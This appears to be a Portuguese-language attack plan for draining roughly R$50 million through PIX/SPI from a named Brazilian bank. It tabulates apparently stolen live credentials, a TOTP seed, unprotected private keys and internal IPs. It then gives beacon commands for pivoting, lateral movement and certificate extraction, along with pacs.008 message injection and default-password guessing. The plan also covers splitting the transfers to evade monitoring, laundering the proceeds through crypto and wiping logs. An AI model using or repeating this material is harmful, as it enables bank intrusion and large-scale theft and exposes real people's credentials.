Pular para o conteúdo
Digite para buscar
navegar Enter abrir / buscar Busca local · Pagefind + fuzzy

15 — PIX/SPI: R$50M — O que Temos e o Caminho

A CONTA PI: ~R$50 MILHÕES

Os relatórios regulatórios confirmam:

  • Patrimônio total: R$57,5 bilhões
  • 99,7% está em ações e títulos (B3 + SELIC)
  • O banco quase não faz PIX (holding de investimentos, um único “cliente”)
  • Estimativa da Conta PI: R$30-50 milhões (baseado no volume PIX histórico)

Não é R$35 bilhões. Mas R$50M líquidos, instantâneos e irreversíveis, em uma noite, é R$50M.


O QUE JÁ TEMOS (100% CONFIRMADO NOS DOWNLOADS)

Credenciais diretas para o Gateway PIX

DadoValorArquivo fonte
SPB Produção (login)Administradoracessos.xlsx
SPB Produção (senha)BCO01claacessos.xlsx
SPB Produção (hardware)Dell PowerEdge T130acessos.xlsx
SPB Homologação (login)Administradoracessos.xlsx
SPB Homologação (senha)BCO01claacessos.xlsx
ISPB Banco Clássico31597552público (BACEN)
Tipo PIXRSFN (participante direto)público

Credenciais para a rede financeira

DadoValorArquivo fonte
Servidor RTM (IP)10.225.32.119serv_rtm.rdp
Servidor RTM (login)Administradoracessos.xlsx
Servidor RTM (senha)Bcclassico123456789acessos.xlsx
Cloud RTM (IP)172.168.170.37cloud_rtm.rdp
Cloud RTM (user)Classicocloud_rtm.rdp

Credenciais Sinqia (gateway bancário)

DadoValorArquivo fonte
Sinqia userjacksonciliano.classico@cloud.localacessos.xlsx
Sinqia passJ@ckson138728nini138728acessos.xlsx
TOTP seedFFDE ILVG ILTV WVYP DQZF TUPT 5A5W FRN3acessos.xlsx
TOTP backupJ@030473acessos.xlsx
IP Sinqia interno192.168.10.113hosts.txt
Componentessqctrl, bff, keycloak, artemishosts.txt

SQL Server (dados PIX no banco)

DadoValorArquivo fonte
Serverserver02web.config
DatabaseBancoClassicoDBweb.config
Usersysbancoclassicoweb.config
PassBCO01claweb.config
Tabelas PIXpix.t410rcon, pix.t410chpxchaves.xlsx (query visível)

Certificados Bradesco (6 pares)

ArquivoStatus
cert2015.key, cerificado2018.key, certac.key, certi2012.key, certif2010.key, ncert.key✅ Baixados
Chaves privadas em PEM✅ Sem senha
Padrão do banco: certs em PEM sem proteção✅ Confirmado

Chrome passwords (yuri.menezes)

Máquina comprometida: NBGRLP250031 (não é do banco, é de outra rede)

  • Senhas de Embratel, Proton, Meta, SchoolGuardian, etc.
  • Credencial Embratel: EOL7143932 / B9cQtfDK

Banco do Brasil (faturamento)

Conta 2004 712264 — recebe duplicatas de:

  • Rumo (Paulista + Sul) — ferrovia
  • FCA (Ferrovia Centro-Atlântica) — ferrovia
  • Vale (ES + MA) — mineração
  • ArcelorMittal — siderurgia
  • Valores: milhares a centenas de milhares por duplicata
  • Meses: abril, maio, junho 2026

Isso é provavelmente de uma empresa de Abdalla que presta serviços às ferrovias/mineradoras (manutenção de trilhos, venda de materiais).


OS 3 CAMINHOS PARA PIX (com dados confirmados)

CAMINHO 1: Via Sinqia sqctrl (MAIS FÁCIL)

Beacon na rede 192.168.10.0/24
├── socks start 1080 5
├── Browser com proxy → https://sqctrl.bancoclassico.com.br
│ Login: jacksonciliano.classico@cloud.local
│ Senha: J@ckson138728nini138728
│ TOTP: pyotp.TOTP("FFDEILVGILTVWVYPDQZFTUPT5A5WFRN3").now()
└── No painel:
PIX → Nova transação → Preencher dados → Enviar
O sistema Sinqia assina e envia automaticamente

Por que é o mais fácil: Não precisa extrair certificados. O sistema já está configurado. Tu opera como se fosse o Jackson sentado na mesa dele.

O que precisa descobrir no painel:

  • Menu de PIX (pode ser “Pagamentos”, “SPB”, “Transferências”)
  • Se tem aprovação dupla (maker/checker)
  • Limites por transação
  • Saldo da Conta PI

CAMINHO 2: Via Artemis (INJEÇÃO DE MENSAGEM)

Beacon na rede
├── lportfwd start 8161 192.168.10.113 8161
├── Browser → http://127.0.0.1:8161/console/
│ Login: admin/admin ou admin/BCO01cla
└── No Artemis:
Queues → localizar fila de PIX outbound
Send Message → colar XML pacs.008
O gateway processa, assina e envia ao SPI

Por que funciona: O Artemis é o message broker. Todas as mensagens passam por ele. Se tu publica uma pacs.008 na fila certa, o gateway trata como legítima.

CAMINHO 3: Via SPB Produção (EXTRAÇÃO DE CERTS)

Beacon na rede
├── Lateral → SPB Produção (Administrador / BCO01cla)
│ jump psexec <SPB_HOST> <beacon>
│ ou token make Administrador BCO01cla . 9
├── No SPB Produção:
│ ps run certutil -store My ← listar certs
│ dir C:\ /s /b *.pfx *.pem *.key ← buscar no disco
│ dir C:\ /s /b *.jks ← Java keystore
├── Extrair CERTPIC + CERTPIA
│ download C:\path\to\certpic.pem
│ download C:\path\to\certpia.pem
│ (ou DPAPI se em Windows cert store)
└── Enviar pacs.008 direto ao SPI:
POST https://icom.pi.rsfn.net.br:16422/api/v1/in/31597552/msgs
(precisa mTLS com CERTPIC + IP cadastrado = do servidor RTM)

LIMITES REAIS

LimiteValorContorno
Saldo Conta PI~R$30-50MÉ o teto absoluto. Não dá pra tirar mais do que tem.
Saldo mínimo (Res.554)ConfigurávelVerificar/desativar no SPB-Web ou sqctrl
Bloqueio automáticoSe ativadoDesativar via SPB-Web (duplo comando)
Rate limiting ICOM1 token/pacs.008Espaçar transações
Maker/checker no SinqiaPossívelSe tem, precisa 2 usuários diferentes
MED 2.0Rastreio em cadeia (72h)Converter pra crypto < 72h
MonitoramentoAlertas de movimentação atípicaOperar dentro do horário comercial

DIVIDIR EM QUANTAS TRANSAÇÕES

Se a Conta PI tem R$50M e tu quer drenar tudo:

EstratégiaQtdValor cadaTempoRisco
Uma só1R$50M40 segMÁXIMO (spike óbvio)
Grandes5R$10M~5 minAlto
Médias50R$1M~1hMédio
Pequenas500R$100K~8hMenor (mas mais tempo exposto)

Recomendação: 10-20 transações de R$2,5-5M cada, espaçadas em 5-10 minutos, dentro do horário comercial (9h-17h), para contas PJ em bancos diferentes.


O QUE NÃO TEMOS E PRECISA CONFIRMAR

ItemStatusComo confirmar
Saldo exato Conta PILogar no sqctrl → PIX → Saldo
IP do SPB Produçãonbtscan 192.168.10.0/24
Portas Sinqia abertassmartscan 192.168.10.113 -p full
Senha admin KeycloakTentar admin/admin, admin/BCO01cla
Senha admin ArtemisTentar admin/admin, admin/BCO01cla
Aprovação dupla (maker/checker)Tentar criar PIX no sqctrl e ver se pede 2º aprovador
CERTPIC/CERTPIA localEnumerar no SPB Produção
Contas destino preparadasNecessário antes de executar

SEQUÊNCIA DE EXECUÇÃO

FASE 1: RECON (30 min)
1. nbtscan 192.168.10.0/24 → mapear todos os hosts
2. smartscan 192.168.10.113 -p full → portas Sinqia
3. Logar sqctrl com creds Sinqia → ver menus, saldo, limites
4. Testar Artemis admin console → ver filas
5. Testar BFF /actuator → pegar secrets
FASE 2: PREPARAÇÃO (1-2 dias antes)
6. Preparar contas destino (PJ em bancos digitais + exchanges)
7. Se maker/checker: comprometer 2º usuário via Keycloak
8. Verificar/desativar saldo mínimo
9. Testar com PIX de R$0.01 em homologação (SPB Homol)
FASE 3: EXECUÇÃO (1-2 horas, horário comercial)
10. Logar sqctrl OU acessar Artemis
11. Executar 10-20 PIX de R$2,5-5M cada
12. Confirmar liquidação (pacs.002 ACSP)
13. Monitorar por rejeições (AM04 = sem saldo)
FASE 4: PÓS-OP (< 72h)
14. Converter recebimentos para crypto
15. Limpar logs (sqctrl, Artemis, eventlog do SPB)
16. Remover evidências de acesso